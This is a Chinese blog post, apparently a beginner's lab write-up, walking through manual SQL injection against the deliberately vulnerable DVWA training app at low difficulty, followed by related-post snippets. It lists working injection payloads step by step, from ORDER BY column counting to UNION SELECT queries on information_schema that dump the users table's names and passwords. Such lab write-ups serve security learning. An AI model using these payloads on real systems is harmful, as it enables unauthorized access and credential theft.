小白打DVWA靶场sql injection注入LOW难度

已于 2023-09-12 14:47:34 修改
阅读量89 收藏 1
点赞数 1
文章标签: sql
于 2023-09-12 14:44:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61781411/article/details/132830973
版权

1、输入 1'        报错,判断有注入点,并且显示mysql数据库

2、输入1 and 1=1 能正常输出结果

再输入1 and 1=2 也能正常输出结果    

判断不是数值型输入(如果是数值型输入,那么1=2应该不会显示出来)

3、输入1' and '1'='1 能正常输出 

      输入1' and '1'='2 不能正常输出

      输入1"and "1"="1 也能正常输出

      输入1"and "1"="2 也能正常输出

判断出来,是单引号的字符注入。

4、开始通过order by 判断有多少字段数

        输入 1’ order by 1 能正常输出 

        输入 1’ order by 2 能正常输出 

        输入 1’ order by 3 报错                        判断字段数只有2

5、开始使用联合查询数据库名

        1' union select 1,database()  #                        (#用于注释掉后面的符号)

        得到数据库名为dvwa

6、再查找dvwa数据库中的所有表名

       1' union select 1,table_name  from information_schema.tables where table_schema='dvwa' #

(information_schema数据库中tables用于存放数据库所有的表)

得出来有两个表,一个是guestbook,一个是users;

7、再查看users表的所有列

1' union select 1,column_name from information_schema.columns where table_schema = 'dvwa' and table_name='users' #

(information_schema数据库中columns用于存放数据库所有的列 )

的出来有列user_name和password

8、最后找到对应用户姓名和密码

1' union select user , password from dvwa.users #

学习帖子:网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)_在dvwa平台中完成一次sql注入,安全等级为初级。-CSDN博客

m0_61781411
关注
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1010
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
DVWA】1.SQL Injection通关记录(Low
Zichel77的博客
10-21 301
Security Level:Low 1.判断注入点及注入类型 看到的是一个输入框,输入数字有对应返回值 所以这里应该是一个注入点,使用恒真恒假式来尝试一下 输入1' and '1'='2返回无结果,确定此处为注入点 再用恒真式来显示所有结果 输入1' or '1'='1('1'='1'恒真,中间使用or连接则整个查询式子恒真,即可返回所有查询结果) 2.判断数据库中的字段数 ...
DVWA-----SQL Injection(SQL手工注入
m0_65712192的博客
11-21 6455
DVWA-----SQL Injection(SQL手工注入
DVWASQL注入(低级)
heyingcheng的博客
11-17 2580
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1(#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入low级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA下的SQL注入
07-25
### DVWA下的SQL注入知识点详解 #### 一、SQL注入基础概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过这种手段将恶意SQL代码插入到应用程序的查询中,以达到非法访问或篡改数据的目的。在本篇内容中...
SQL】深入探索SQL调优:提升数据库性能的全面指南
人生苦短,睡觉要紧,睡醒再说
10-09 1459
在本文中,我们深入探讨了SQL调优的重要性及其在提升数据库性能中的关键角色。从理解执行计划到选择合适的索引,每一个细节都能显著影响应用程序的响应速度和处理能力。我们强调了基本的优化原则,如避免使用SELECT *、合理使用JOIN,以及定期更新统计信息。同时,数据库配置和硬件优化也不可忽视,它们直接关系到系统的整体性能。通过采用这些策略和技术,开发者和数据库管理员能够有效提高数据库的效率,确保系统在高负载下依然稳定运行。
sql调优指南及高级sql技巧
weixin_42462436的博客
10-13 583
SQL调优和高级SQL技巧是数据库管理和开发中的重要内容,能够帮助你更高效地进行数据库查询操作并优化性能。以下内容将详细介绍SQL调优的指南、常见的优化策略,以及一些高级SQL编写技巧。
手写mybatis之SQL执行器的定义和实现
CSDN_LiMingfly的博客
10-08 873
所有系统的设计和实现,核心都在于如何解耦,如果解耦不清晰最后直接导致的就是再继续迭代功能时,会让整个系统的实现越来越臃肿,稳定性越来越差。而关于解耦的实践在各类框架的源码中都有非常不错的设计实现,所以阅读这部分源码,就是在吸收成功的经验。把解耦的思想逐步运用到实际的业务开发中,才会让我们写出更加优秀的代码结构。设计。
【PostgreSQL 】运维篇——未来趋势:发展与社区
thinking_chou的专栏
10-10 923
PostgreSQL活跃的社区生态为用户提供了丰富的资源和支持,社区成员可以通过多种方式参与到PostgreSQL的开发和推广中。通过共同努力,PostgreSQL将继续成为一个强大、灵活和安全的数据库解决方案,满足不断变化的业务需求。
LlamaIndex 结构化数据库交互指南增强(text2sql
洛阳泰山的博客
10-10 1252
许多现代数据系统都依赖于结构化数据,例如或Snowflake数据仓库。LlamaIndex提供了许多由LLM提供支持的高级功能,可以从中创建结构化数据 非结构化数据,以及通过增强的文本到 SQL 功能分析这些结构化数据。:任何应用程序都应该意识到,执行 任意SQL查询可能存在安全风险。建议 根据需要采取预防措施,例如使用受限角色、只读 数据库、沙箱等。本指南帮助介绍这些功能中的每一项。SQLsql
MYSQL|高频 SQL 50 题|550. 游戏玩法分析 IV
糖炒栗子
10-09 910
SELECTplayer_id,FROMactivityGROUP BYplayer_id:通过 WITH 子句,定义一个公共表达式;MIN函数找到每个玩家首次登陆日期;按照 player_id 进行分组。可以讲 CTE 理解为一个临时表,它包含了每个玩家的首次登陆日期,供住查询中使用。
SQL】连续出现的数字
最新发布
Frost_Descent的博客
10-13 420
SQL 中用于过滤查询结果的一种条件语句,它允许从一个给定的值列表中选择匹配的行。例如,选择所有名称以“Mac”开头的产品,虽然这通常使用。例如,选择所有国家为“USA”、“India”和“China”的产品。当需要从一个列中选择具有特定值的行时,可以使用。即(id,num)中id+1,+2,num不变。单纯面向题目,三表连接或者子查询均可以实现。在 SQL 中,id 是该表的主键。1 是唯一连续出现至少三次的数字。找出所有至少连续出现三次的数字。返回的结果表中的数据可以按。id 是一个自增列。
Dify实现text2sql工作流[SQL调用篇],并查询Postgres数据库 or Mysql数据库(docker容器)
丨汀、的博客
10-09 143
Dify实现text2sql工作流[SQL调用篇],并查询Postgres数据库 or Mysql数据库(docker容器)
HeidiSQL 数据库密码如何恢复
HONEY MOOSE
10-09 509
有时候我们会把数据库的连接密码保存在 HeidiSQL 中,但随着时间的流逝,我们可能希望重新找回保存在 HeidiSQL 中的密码,但 HeidiSQL 中保存的密码是无法被复制的。这时候,我们需要想办法找到原始的密码。
SQL自学:怎么创建视图
Nervousr的博客
10-13 720
具体来说,选择了“customers”表中的“customer_name”(客户姓名)和“city”(客户所在城市),同时通过对“orders”表中的“order_id”进行计数(使用“COUNT(o.order_id)”并别名为“total_orders”)得到每个客户的订单总数,以及对“orders”表中的“total_amount”进行求和(使用“SUM(o.total_amount)”并别名为“total_amount”)得到每个客户的总金额。这个视图是基于名为“employees”的表创建的。
dvwa靶场sql注入
06-03
DVWA是一个用于测试Web应用程序安全性的靶场,其中包含了一些漏洞,比如SQL注入漏洞。下面是在DVWA靶场进行SQL盲注的一般步骤: 1. 打开DVWA靶场,选择SQL注入模块。 2. 点击“注入”按钮,进入注入页面。 3. 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值